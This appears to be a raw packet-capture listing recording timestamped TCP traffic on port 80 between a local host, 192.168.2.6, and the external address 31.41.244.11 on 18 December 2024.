                                                                                                                                                              Dec 18, 2024 11:47:15.026700974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.026712894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.026829958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.044469118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044487000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044540882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.044564962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.044703960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044714928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044725895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044742107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044751883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.044805050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.044820070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044831991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.044859886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.044899940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045034885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045046091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045056105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045073986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045074940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045085907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045097113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045108080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045114040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045119047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045160055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045420885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045471907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045679092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045690060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045701981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045713902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045722008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045725107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045754910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045757055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045766115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045778990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045787096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045790911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045802116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045808077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045813084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045829058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045830011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045842886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.045876026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.045896053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.046185017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.046199083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.046226025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.046266079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.046535969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.046576977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.046713114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.046757936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.047730923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.047791004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.047894001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.047951937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.048894882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.048960924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.048994064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.049048901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.050049067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.050103903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.050128937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.050172091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.051245928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.051309109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.051345110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.051387072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.052405119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.052463055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.052522898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.052567005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.053642035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.053687096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.053699017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.053730011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.054742098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.054828882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.054841995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.054891109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.184736013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.184864044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.184871912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.184914112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.185554981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.185604095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.185609102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.185663939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.186520100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.186564922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.186645031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.186686039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.187711000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.187764883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.189074993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.189126015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.189163923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.189199924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.189677954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.189728022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.189747095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.189800024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.189836025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.190865040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.190922976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.190957069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.190992117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.192002058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.192058086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.192094088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.192130089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.193161011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.193218946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.193303108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.193356037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.194338083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.194391966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.194447994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.194485903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.195524931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.195574999 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.195605993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.195648909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.196703911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.196751118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.196805000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.196841955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.197904110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.197973967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.198029041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.198066950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.199044943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.199055910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.199101925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.199126959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.200191021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.200244904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.200579882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.200632095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.201404095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.201453924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.201467991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.201505899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.202910900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.202965975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.202995062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.203051090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.203710079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.203763008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.203797102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.203836918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.204881907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.204931974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.204966068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.205005884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.206034899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.206085920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.206145048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.206187963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.207253933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.207298994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.207334042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.207377911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.208401918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.208455086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.208523989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.208564997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.209564924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.209625959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.209692001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.209732056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.210783958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.210829973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.210870981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.210911989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.211946964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.212007046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.212039948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.212074995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.213063955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.213128090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.213262081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.213300943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.214246988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.214299917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.214329958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.214366913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.215440989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.215493917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.215523958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.215559006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.216830015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.216886044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.217037916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.217082024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.218312979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.218367100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.218455076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.218497992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.219501972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.219548941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.219765902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.219809055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.220493078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.220535040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.220555067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.220592976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.221302032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.221353054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.221460104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.221502066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.222465992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.222513914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.222549915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.222600937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.223635912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.223680973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.223712921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.223752022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.224833012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.224879980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.224914074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.224948883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.225944996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.225995064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.225995064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.226053953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.227114916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.227164984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.227232933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.227269888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.228315115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.228372097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.228424072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.228470087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.229538918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.229585886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.229654074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.229692936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.230653048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.230700016 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.230715990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.230762005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.231813908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.231867075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.231954098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.231993914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.233001947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.233052969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.233083010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.233129978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.234185934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.234241962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.234272003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.234329939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.235326052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.235375881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.235411882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.235479116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.236521006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.236567020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.236641884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.236684084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.237652063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.237694979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.237726927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.237770081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.238826990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.238873005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.238931894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.238970995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.240012884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.240057945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.240122080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.240161896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.241225958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.241238117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.241283894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.242427111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.242475986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.242503881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.242547989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.243513107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.243557930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.243587017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.243628979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.244714022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.244759083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.244786978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.244827986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.245841026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.245877981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.245894909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.245927095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.375685930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.375750065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.375812054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.375860929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.376271009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.376327038 CET4980680192.168.2.631.41.244.11
